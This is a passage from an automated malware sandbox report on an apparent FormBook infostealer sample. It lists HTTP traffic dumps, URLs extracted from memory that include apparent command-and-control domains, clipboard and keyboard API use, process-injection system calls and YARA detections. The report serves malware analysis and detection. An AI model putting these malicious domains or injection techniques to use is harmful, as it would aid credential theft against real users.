20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 14:29:06 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16026X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 14:29:08 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16026X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61
            Source: IpIaYUETnYWFH.exe, 00000006.00000002.3367695283.0000000004D3A000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.es-lidl.online
            Source: IpIaYUETnYWFH.exe, 00000006.00000002.3367695283.0000000004D3A000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.es-lidl.online/n2dv/
            Source: RpcPing.exe, 00000005.00000002.3367266886.0000000004462000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000005.00000002.3368903830.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000006.00000002.3365902751.0000000003792000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/px.js?ch=1
            Source: RpcPing.exe, 00000005.00000002.3367266886.0000000004462000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000005.00000002.3368903830.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000006.00000002.3365902751.0000000003792000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/px.js?ch=2
            Source: RpcPing.exe, 00000005.00000002.3367266886.0000000004462000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000005.00000002.3368903830.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000006.00000002.3365902751.0000000003792000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/sk-logabpstatus.php?a=bXhMcnlwZUVZbkR2TkpqRG0xWnc5ZTNMZlFTSjFybmRCeWl0
            Source: RpcPing.exe, 00000005.00000003.1993105571.000000000773E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: RpcPing.exe, 00000005.00000003.1993105571.000000000773E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: RpcPing.exe, 00000005.00000002.3367266886.00000000042D0000.00000004.10000000.00040000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000006.00000002.3365902751.0000000003600000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js
            Source: RpcPing.exe, 00000005.00000002.3367266886.00000000042D0000.00000004.10000000.00040000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000006.00000002.3365902751.0000000003600000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: RpcPing.exe, 00000005.00000002.3367266886.00000000042D0000.00000004.10000000.00040000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000006.00000002.3365902751.0000000003600000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css
            Source: RpcPing.exe, 00000005.00000003.1993105571.000000000773E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: RpcPing.exe, 00000005.00000003.1993105571.000000000773E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: IpIaYUETnYWFH.exe, 00000006.00000002.3365902751.0000000003792000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
            Source: RpcPing.exe, 00000005.00000003.1993105571.000000000773E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: RpcPing.exe, 00000005.00000003.1993105571.000000000773E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: RpcPing.exe, 00000005.00000003.1993105571.000000000773E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: RpcPing.exe, 00000005.00000002.3361983815.000000000093A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: RpcPing.exe, 00000005.00000002.3361983815.000000000090E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: RpcPing.exe, 00000005.00000003.1989040837.000000000771B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: RpcPing.exe, 00000005.00000002.3361983815.000000000093A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&
            Source: RpcPing.exe, 00000005.00000002.3361983815.000000000093A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: RpcPing.exe, 00000005.00000002.3361983815.000000000090E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: RpcPing.exe, 00000005.00000002.3361983815.000000000093A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: RpcPing.exe, 00000005.00000002.3361983815.000000000093A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: RpcPing.exe, 00000005.00000003.1993105571.000000000773E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: RpcPing.exe, 00000005.00000003.1993105571.000000000773E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.3367695283.0000000004CE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3356645004.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1804925513.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3365351743.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1809587289.00000000056F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3360236201.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1808701497.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3365349150.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3367695283.0000000004CE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3356645004.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1804925513.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3365351743.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1809587289.00000000056F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3360236201.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1808701497.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3365349150.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C4E3 NtClose,2_2_0042C4E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272B60 NtClose,LdrInitializeThunk,2_2_03272B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03272DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03272C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032735C0 NtCreateMutant,LdrInitializeThunk,2_2_032735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03274340 NtSetContextThread,2_2_03274340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03274650 NtSuspendThread,2_2_03274650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272BA0 NtEnumerateValueKey,2_2_03272BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272B80 NtQueryInformationFile,2_2_03272B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272BE0 NtQueryValueKey,2_2_03272BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272BF0 NtAllocateVirtualMemory,2_2_03272BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272AB0 NtWaitForSingleObject,2_2_03272AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272AF0 NtWriteFile,2_2_03272AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272AD0 NtReadFile,2_2_03272AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272F30 NtCreateSection,2_2_03272F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272F60 NtCreateProcessEx,2_2_03272F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272FA0 NtQuerySection,2_2_03272FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272FB0 NtResumeThread,2_2_03272FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272F90 NtProtectVirtualMemory,2_2_03272F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272FE0 NtCreateFile,2_2_03272FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272E30 NtWriteVirtualMemory,2_2_03272E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272EA0 NtAdjustPrivilegesToken,2_2_03272EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272E80 NtReadVirtualMemory,2_2_03272E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272EE0 NtQueueApcThread,2_2_03272EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272D30 NtUnmapViewOfSection,2_2_03272D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272D00 NtSetInformationFile,2_2_03272D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272D10 NtMapViewOfSection,2_2_03272D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272DB0 NtEnumerateKey,2_2_03272DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272DD0 NtDelayExecution,2_2_03272DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272C00 NtQueryInformationProcess,2_2_03272C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272C60 NtCreateKey,2_2_03272C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272CA0 NtQueryInformationToken,2_2_03272CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272CF0 NtOpenProcess,2_2_03272CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272CC0 NtQueryVirtualMemory,2_2_03272CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273010 NtOpenDirectoryObject,2_2_03273010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273090 NtSetValueKey,2_2_03273090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032739B0 NtGetContextThread,2_2_032739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273D10 NtOpenProcessToken,2_2_03273D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273D70 NtOpenThread,2_2_03273D70
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC4340 NtSetContextThread,LdrInitializeThunk,5_2_02FC4340
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC4650 NtSuspendThread,LdrInitializeThunk,5_2_02FC4650
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC2AF0 NtWriteFile,LdrInitializeThunk,5_2_02FC2AF0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC2AD0 NtReadFile,LdrInitializeThunk,5_2_02FC2AD0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_02FC2BF0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC2BE0 NtQueryValueKey,LdrInitializeThunk,5_2_02FC2BE0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC2BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_02FC2BA0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC2B60 NtClose,LdrInitializeThunk,5_2_02FC2B60
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC2EE0 NtQueueApcThread,LdrInitializeThunk,5_2_02FC2EE0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC2E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_02FC2E80
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC2FE0 NtCreateFile,LdrInitializeThunk,5_2_02FC2FE0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC2FB0 NtResumeThread,LdrInitializeThunk,5_2_02FC2FB0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC2F30 NtCreateSection,LdrInitializeThunk,5_2_02FC2F30
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_02FC2CA0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_02FC2C70
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC2C60 NtCreateKey,LdrInitializeThunk,5_2_02FC2C60
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_02FC2DF0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC2DD0 NtDelayExecution,LdrInitializeThunk,5_2_02FC2DD0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC2D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_02FC2D30
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_02FC2D10
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC35C0 NtCreateMutant,LdrInitializeThunk,5_2_02FC35C0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC39B0 NtGetContextThread,LdrInitializeThunk,5_2_02FC39B0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC2AB0 NtWaitForSingleObject,5_2_02FC2AB0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC2B80 NtQueryInformationFile,5_2_02FC2B80
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC2EA0 NtAdjustPrivilegesToken,5_2_02FC2EA0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC2E30 NtWriteVirtualMemory,5_2_02FC2E30
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC2FA0 NtQuerySection,5_2_02FC2FA0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC2F90 NtProtectVirtualMemory,5_2_02FC2F90
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC2F60 NtCreateProcessEx,5_2_02FC2F60
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC2CF0 NtOpenProcess,5_2_02FC2CF0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC2CC0 NtQueryVirtualMemory,5_2_02FC2CC0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC2C00 NtQueryInformationProcess,5_2_02FC2C00
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC2DB0 NtEnumerateKey,5_2_02FC2DB0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC2D00 NtSetInformationFile,5_2_02FC2D00
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC3090 NtSetValueKey,5_2_02FC3090
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC3010 NtOpenDirectoryObject,5_2_02FC3010
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC3D70 NtOpenThread,5_2_02FC3D70
